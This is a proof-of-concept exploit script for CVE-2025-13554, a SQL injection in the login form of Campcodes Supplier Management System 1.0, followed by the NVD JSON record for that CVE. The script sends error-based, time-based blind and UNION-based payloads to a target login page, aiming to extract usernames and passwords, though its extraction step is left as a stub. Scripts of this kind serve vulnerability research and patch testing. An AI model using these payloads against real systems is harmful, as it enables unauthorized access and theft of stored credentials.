CVE-2025-13554

#!/usr/bin/env python3 """ CVE-2025-13554 PoC - Campcodes Supplier Management System SQL Injection Vulnerable Parameter: txtUsername in /index.php Login Component CVSS Score: 7.3 (High) """ import requests import sys target_url = "http://target.com/index.php" def test_sql_injection(): """Test for SQL injection vulnerability in login form""" # Basic SQL injection test - single quote to trigger error payload_basic = "'" data = { "txtUsername": payload_basic, "txtPassword": "test", "btnLogin": "Login" } print(f"[*] Testing target: {target_url}") print(f"[*] Testing basic SQL injection payload...") try: response = requests.post(target_url, data=data, timeout=10) # Check for SQL error indicators sql_error_indicators = [ "mysql_", "sql syntax", "warning", "error in your sql", "unclosed quotation" ] response_text = response.text.lower() for indicator in sql_error_indicators: if indicator in response_text: print(f"[!] SQL Injection vulnerability confirmed!") print(f"[!] Error indicator found: {indicator}") return True print("[*] Basic test completed, trying blind injection...") # Blind SQL injection test (time-based) # MSSQL time-based blind injection payload_blind = "' WAITFOR DELAY '0:0:5'--" data_blind = { "txtUsername": payload_blind, "txtPassword": "test", "btnLogin": "Login" } import time start = time.time() response = requests.post(target_url, data=data_blind, timeout=15) elapsed = time.time() - start if elapsed >= 5: print(f"[!] Blind SQL Injection confirmed (response delayed by {elapsed:.2f}s)") return True print("[*] Vulnerability check completed") return False except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") return False def extract_data(): """Extract database information using UNION-based injection""" # UNION-based injection to extract user data payload = "' UNION SELECT NULL,NULL,username,password,NULL,NULL FROM users--" data = { "txtUsername": payload, "txtPassword": "test", "btnLogin": "Login" } print(f"[*] Attempting data extraction...") try: response = requests.post(target_url, data=data, timeout=10) # Parse response to extract credentials print(f"[*] Response length: {len(response.text)}") # Add extraction logic here except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") if __name__ == "__main__": print("=" * 60) print("CVE-2025-13554 SQL Injection PoC") print("Target: Campcodes Supplier Management System 1.0") print("=" * 60) if test_sql_injection(): print("\n[*] Vulnerability exists, proceeding with data extraction...") extract_data() else: print("\n[*] No obvious vulnerability detected")

{"cve": {"id": "CVE-2025-13554", "sourceIdentifier": "[email protected]", "published": "2025-11-23T15:15:46.217", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in Campcodes Supplier Management System 1.0. This impacts an unknown function of the file /index.php of the component Login. Such manipulation of the argument txtUsername leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:campcodes:supplier_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "836654A6-0614-4B2F-A556-E005AF4C7DE1"}]}]}], "references": [{"url": "https://github.com/arpcyber060/CVE/issues/3", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.333321", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.333321", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.696515", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.campcodes.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/arpcyber060/CVE/issues/3", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}